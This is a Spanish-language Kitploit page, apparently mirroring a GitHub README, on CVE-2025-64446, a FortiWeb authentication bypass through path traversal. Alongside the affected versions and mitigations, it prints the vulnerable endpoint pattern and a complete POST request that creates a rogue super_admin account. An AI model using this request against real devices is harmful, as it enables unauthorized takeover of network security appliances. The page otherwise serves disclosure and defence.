Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/0xblackash/cve-2025-64446
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

Ver Repositorio
4hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2025-64446 - Omisión Crítica de Autenticación y Salto de Ruta en FortiWeb

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

Vulnerabilidad crítica no autenticada que permite a atacantes remotos crear cuentas de administrador en dispositivos FortiWeb.


📌 Resumen

CVE-2025-64446 es una grave vulnerabilidad de salto de ruta relativa en la interfaz de gestión de FortiWeb Web Application Firewall.

Un atacante remoto no autenticado puede explotar esta falla para eludir la autenticación y crear nuevos usuarios administradores con todos los privilegios, lo que lleva a un compromiso total del dispositivo.

  • Puntuación CVSS v3.1: 9.8 (Crítica)
  • Tipo de ataque: Remoto no autenticado
  • Impacto: Toma de control administrativo total
  • Estado: Explotado activamente en la naturaleza

🛠️ Versiones Afectadas

Recomendación: Actualice a la versión parcheada más reciente lo antes posible.


🔥 Cómo Explotan los Atacantes Esta Vulnerabilidad

Explotación Paso a Paso

  1. Identificación del Objetivo
    El atacante escanea interfaces de gestión de FortiWeb expuestas públicamente (generalmente en el puerto HTTPS 443 o 8443).

  2. Creación de la Solicitud Maliciosa
    El núcleo del exploit es un salto de ruta relativa (../) combinado con una URL especialmente diseñada que alcanza un endpoint CGI interno no autenticado.

    Patrón de Endpoint Vulnerable:

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. Envío del Exploit

    El atacante envía una única solicitud POST con un payload JSON para crear una nueva cuenta de administrador.

    Ejemplo de Solicitud de Exploit:

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiw eb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. Explotación Exitosa

    Si tiene éxito, FortiWeb crea la nueva cuenta de administrador sin requerir autenticación previa. El atacante puede entonces iniciar sesión con las credenciales recién creadas y obtener el control total del WAF.

Por Qué Funciona

La API de gestión no sanean correctamente la ruta, lo que permite que la solicitud retroceda al binario heredado fwbcgi, que no aplica autenticación en ciertas operaciones.


📸 Capturas de Pantalla

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ Mitigación y Mejores Prácticas

  • Actualice inmediatamente FortiWeb a una versión corregida
  • Nunca exponga la interfaz de administración directamente a Internet
  • Utilice segmentación de red sólida y VPN para el acceso administrativo
  • Monitoree los registros en busca de solicitudes que contengan fwbcgi, ../ o intentos inusuales de creación de administradores
  • Audite regularmente las cuentas de administrador para detectar entradas sospechosas

Solo con fines educativos y de investigación defensiva de seguridad.

Hecho con ❤️ para la comunidad de ciberseguridad

Última actualización: Abril 2026

Descargar herramienta
ProductoVersiones AfectadasVersión Corregida
FortiWeb 8.08.0.0 – 8.0.18.0.2 y superiores
FortiWeb 7.67.6.0 – 7.6.47.6.5 y superiores
FortiWeb 7.47.4.0 – 7.4.97.4.10 y superiores
FortiWeb 7.27.2.0 – 7.2.117.2.12 y superiores
FortiWeb 7.07.0.0 – 7.0.117.0.12 y superiores